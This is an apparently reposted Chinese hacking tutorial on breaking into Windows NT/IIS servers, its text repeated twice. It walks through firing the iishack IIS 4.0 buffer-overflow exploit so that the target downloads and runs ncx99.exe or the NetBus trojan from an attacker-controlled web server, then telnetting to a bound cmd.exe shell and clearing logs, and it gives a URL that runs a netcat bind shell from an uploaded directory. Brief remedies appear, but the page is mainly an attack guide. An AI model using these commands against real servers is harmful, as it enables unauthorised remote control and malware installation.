【标 题】:入侵NTserver典型途径攻击基础 二
【关键字】:NT,攻击,server,入侵,serv,NTserver
【来 源】:网络
第三个方法:用netcat和iishack
如果你熟悉使用Netcat这个工具,你就知道netcat可以利用NT的弱点在其上绑定端口,下面用的eEye工具已经介绍过,如果你熟悉Netcat,成功的可能性会更大。
IIS的ISAPI的毛病(*.HTR):我们再来看看eEye最近这两天发现的一个关于NT/IIS的问题和工具。在IIS的/Inetsrv目录下,有个DLL文件叫ism.dll,这个模块在web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现。IIShack.asm,利用这个毛病,eEye写了两个程序:
iishack.exe、ncx99.exe,为达目的你必须自己有一个web server,把ncx99.exe和netbus木马传到这个web
server的目录下,比如你的web server是www.mysvr.com,而对方的IIS server是www.xxx.com,则:
iishack www.xxx.com 80 www.mysvr.com/ncx99.exe (注意:不要加“http://”字符!)
上述命令输入后这时你应该可以看到:
------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- barns@eeye.com.
http://www.eEye.com
[usage: iishack 〈host〉 〈port〉 〈url〉]
eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
do not include http://' before hosts!
---------------------------------------------------------------
Data sent!
然后:再把Netbus等特洛伊木马传到对方机器上去:
iishack www.example.com 80 www.myserver.com/netbus.exe
ncx99.exe实际上是有名的Netcat的变种,它把对方server的cmd.exe绑定到Telnet服务,ncx.exe这是较早的版本,是把端口绑到80的,由于80端口跑web服务,端口已经被使用,所以可能不一定有效。然后,用Telnet到对方的99或80端口:
Telnet www.xxx.com 99
结果是这样:
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\>[You have full access to the system, happy browsing :)]
C:\>[Add a scheduled task to restart inetinfo in X minutes]
C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes]
C:\>[Clean up any trace or logs we might have left behind.]
这样,你就完全控制了其 硬盘 上的文件!注意,如果你type exit退出,对方server上的这个进程也会退出。
参考资料: eeye.zip
补救方法:在IIS的www service属性中将主目录的应用程序设置的*.htr的映射删除。
第四个方法:如果你具有一个目录的上传权限,且这个目录具有执行的许可,那么恭喜你,你可以Telnet到这台server了!
下面是具体步骤:
假设你的目录是www.xxx.com/frankie,那么,把cmd.exe(位于C:\winnt\system32\cmd.exe)和Netcat里面包含的nc.exe传到这个目录上去,然后在 浏览器 端输入:
http://www.xxx.com/frankie/cmd.exe?/c%20nc.exe%20-l%20-p%2023%20-t%20-e%20cmd.exe
这时候你的浏览器将停止不动,实际上server上的Telnet的服务已经产生了。
这时,用Telnet连接www.xxx.com的23端口,你发现会不用密码、不用登陆,对方“C:\”提示符已经出现在你的眼前!更妙的是,这个Telnet
server是一个一次性的服务,当客户端一退出,该服务也将终止。
Netcat不同于一般的特洛伊木马,它可以构建任何的TCP连接服务,在浏览器端输入上述的字符串,等价于在NT的dos方式下输入“nc -l -p
23 -t -e cmd.exe”,这将把cmd.exe绑定到23端口上。
【关键字】:NT,攻击,server,入侵,serv,NTserver
【来 源】:网络
入侵NTserver典型途径攻击基础 二
如果你熟悉使用Netcat这个工具,你就知道netcat可以利用NT的弱点在其上绑定端口,下面用的eEye工具已经介绍过,如果你熟悉Netcat,成功的可能性会更大。
IIS的ISAPI的毛病(*.HTR):我们再来看看eEye最近这两天发现的一个关于NT/IIS的问题和工具。在IIS的/Inetsrv目录下,有个DLL文件叫ism.dll,这个模块在web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现。IIShack.asm,利用这个毛病,eEye写了两个程序:
iishack.exe、ncx99.exe,为达目的你必须自己有一个web server,把ncx99.exe和netbus木马传到这个web
server的目录下,比如你的web server是www.mysvr.com,而对方的IIS server是www.xxx.com,则:
iishack www.xxx.com 80 www.mysvr.com/ncx99.exe (注意:不要加“http://”字符!)
上述命令输入后这时你应该可以看到:
------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- barns@eeye.com.
http://www.eEye.com
[usage: iishack 〈host〉 〈port〉 〈url〉]
eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
do not include http://' before hosts!
---------------------------------------------------------------
Data sent!
然后:再把Netbus等特洛伊木马传到对方机器上去:
iishack www.example.com 80 www.myserver.com/netbus.exe
ncx99.exe实际上是有名的Netcat的变种,它把对方server的cmd.exe绑定到Telnet服务,ncx.exe这是较早的版本,是把端口绑到80的,由于80端口跑web服务,端口已经被使用,所以可能不一定有效。然后,用Telnet到对方的99或80端口:
Telnet www.xxx.com 99
结果是这样:
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\>[You have full access to the system, happy browsing :)]
C:\>[Add a scheduled task to restart inetinfo in X minutes]
C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes]
C:\>[Clean up any trace or logs we might have left behind.]
这样,你就完全控制了其 硬盘 上的文件!注意,如果你type exit退出,对方server上的这个进程也会退出。
参考资料: eeye.zip
补救方法:在IIS的www service属性中将主目录的应用程序设置的*.htr的映射删除。
第四个方法:如果你具有一个目录的上传权限,且这个目录具有执行的许可,那么恭喜你,你可以Telnet到这台server了!
下面是具体步骤:
假设你的目录是www.xxx.com/frankie,那么,把cmd.exe(位于C:\winnt\system32\cmd.exe)和Netcat里面包含的nc.exe传到这个目录上去,然后在 浏览器 端输入:
http://www.xxx.com/frankie/cmd.exe?/c%20nc.exe%20-l%20-p%2023%20-t%20-e%20cmd.exe
这时候你的浏览器将停止不动,实际上server上的Telnet的服务已经产生了。
这时,用Telnet连接www.xxx.com的23端口,你发现会不用密码、不用登陆,对方“C:\”提示符已经出现在你的眼前!更妙的是,这个Telnet
server是一个一次性的服务,当客户端一退出,该服务也将终止。
Netcat不同于一般的特洛伊木马,它可以构建任何的TCP连接服务,在浏览器端输入上述的字符串,等价于在NT的dos方式下输入“nc -l -p
23 -t -e cmd.exe”,这将把cmd.exe绑定到23端口上。
【相关文章】
端口知识及攻击方法
入侵技术介绍
再谈NT简单的入侵
黑客常用的9种攻击方法
NT/2000提升权限的方法小结
WWW攻击手法
SCO OpenServer Display本地权限提升漏洞
黑客常用攻击方式之DDoS攻击全面剖析
你看的懂的入侵方法(NT篇)
入侵检测技术剖析
【随机文章】
awk实例介绍(转载IBM中国)
深入研究Application和Session对象(3)
Enctype说明
CCProxy 5.0 注册码算法分析 下
一个ORACLE分页程序
WEB2.0,消费者的“人权”时代
获取汉字拼音
玩玩Spring之初章
OS之旅--- BIOS
informix记录
【相关评论】
没有相关评论
【发表评论】
|